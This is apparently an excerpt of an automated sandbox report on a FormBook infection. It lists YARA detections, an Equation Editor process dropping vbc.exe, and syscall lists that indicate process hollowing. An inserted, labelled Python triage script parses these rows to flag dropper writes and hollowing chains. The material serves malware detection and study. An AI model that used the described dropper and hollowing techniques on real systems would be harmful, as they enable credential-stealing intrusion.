          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2181679428.00000000039F4000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
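Added example (not part of this report and not Joe Sandbox code): a small Python triage script that re-parses rows in the format used throughout this section, the two EQNEDT32.EXE file-drop rows above and the vbc.exe and ipconfig.exe "Code function: N_M_ADDR Nt..." rows that follow, and derives two verdicts from them: whether an Office helper process wrote a PE-named file into the world-writable Public profile, and whether a process resolved the unmap / write / execute syscall set that process hollowing needs. The row regex, the OFFICE_HELPERS set, the grouping of Nt* names into stages and the sample rows are assumptions of the example; the sample rows are a constructed subset copied from this section with a space inserted between the two table cells.

```python
"""Triage of sandbox report rows: Office dropper writes and hollowing syscall chains.
Added example for this page; not part of the report or of Joe Sandbox."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample input: rows copied from this report's System Summary section.
SAMPLE_ROWS = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFE24 NtWriteVirtualMemory,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008D1930 NtSetContextThread,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFF34 NtQueueApcThread,",
    r"Source: C:\Users\Public\vbc.exe Code function: 5_2_008CFFFC NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 7_2_020B00C4 NtCreateFile,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 7_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,",
]

# Assumed row grammar: "Source: <image path>" followed by either a "File created:" cell
# or a "Code function: <pid>_<dump run>_<hex address> <api,api,...>" cell. The two
# cells may be run together with no space, as in the extracted report text.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*"
    r"(?:File created:\s*(?P<dropped>.+?)"
    r"|Code function:\s*(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+(?P<apis>.+?))"
    r"\s*$"
)

OFFICE_HELPERS = {"eqnedt32.exe"}            # assumption: only the Equation Editor, as in this report
PE_SUFFIXES = {".exe", ".dll", ".scr", ".com"}
PUBLIC_DIR = "c:\\users\\public\\"           # writable by every interactive user

# Assumed stage grouping for the hollowing pattern. Any one "execute" trigger is enough:
# NtSetContextThread + NtResumeThread redirects the suspended main thread, NtQueueApcThread
# runs the payload as an APC instead.
HOLLOW_STAGES = {
    "unmap":   {"NtUnmapViewOfSection"},
    "write":   {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "execute": {"NtSetContextThread", "NtResumeThread", "NtQueueApcThread"},
}


def parse_row(line):
    """Split one report row into its source image and either a dropped path or an API list."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    if row["apis"] is not None:
        row["apis"] = [a.strip() for a in row["apis"].split(",") if a.strip()]
        row["pid"] = int(row["pid"])
    return row


def office_drops(lines):
    """Files written by an Office helper, flagged for PE-looking names and the Public profile."""
    findings = []
    for line in lines:
        row = parse_row(line)
        if row is None or row["dropped"] is None:
            continue
        host = PureWindowsPath(row["src"]).name.lower()
        if host not in OFFICE_HELPERS:
            continue
        target = PureWindowsPath(row["dropped"])
        findings.append({
            "host": host,
            "dropped": str(target),
            "is_pe_name": target.suffix.lower() in PE_SUFFIXES,
            "in_public": str(target).lower().startswith(PUBLIC_DIR),
        })
    return findings


def nt_apis_by_process(lines):
    """Distinct Nt* names each (image, pid) resolves; the trailing LdrInitializeThunk name is ignored."""
    seen = defaultdict(set)
    for line in lines:
        row = parse_row(line)
        if row is None or row["apis"] is None:
            continue
        key = (PureWindowsPath(row["src"]).name.lower(), row["pid"])
        seen[key].update(a for a in row["apis"] if a.startswith("Nt"))
    return dict(seen)


def hollowing_candidates(lines):
    """Processes whose resolved syscalls cover all three stages of the hollowing pattern."""
    verdicts = {}
    for key, apis in nt_apis_by_process(lines).items():
        hits = {stage: sorted(apis & names) for stage, names in HOLLOW_STAGES.items()}
        if all(hits.values()):
            verdicts[key] = hits
    return verdicts


if __name__ == "__main__":
    for finding in office_drops(SAMPLE_ROWS):
        print("drop:", finding)
    for (image, pid), hits in hollowing_candidates(SAMPLE_ROWS).items():
        print(f"hollowing chain in {image} (pid {pid}):", hits)
```

On the sample rows the script reports the vbc.exe drop as a PE name inside C:\Users\Public and the winlog[1] write as neither (that path is the WinINet cache copy of the download, and vbc.exe is where it was copied to), and it flags pid 5 (vbc.exe) but not pid 7 (ipconfig.exe), whose rows in the sample only show file and process-information syscalls. Pointing the two functions at the full row list of a report rather than the embedded subset is a matter of reading the lines from a file; the row grammar is the same.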
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041817A NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CF8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CF938 NtWriteFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008D1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_008CFF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041817A NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041826A NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020B00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020AFD8C NtDelayExecution,LdrInitializeThunk,
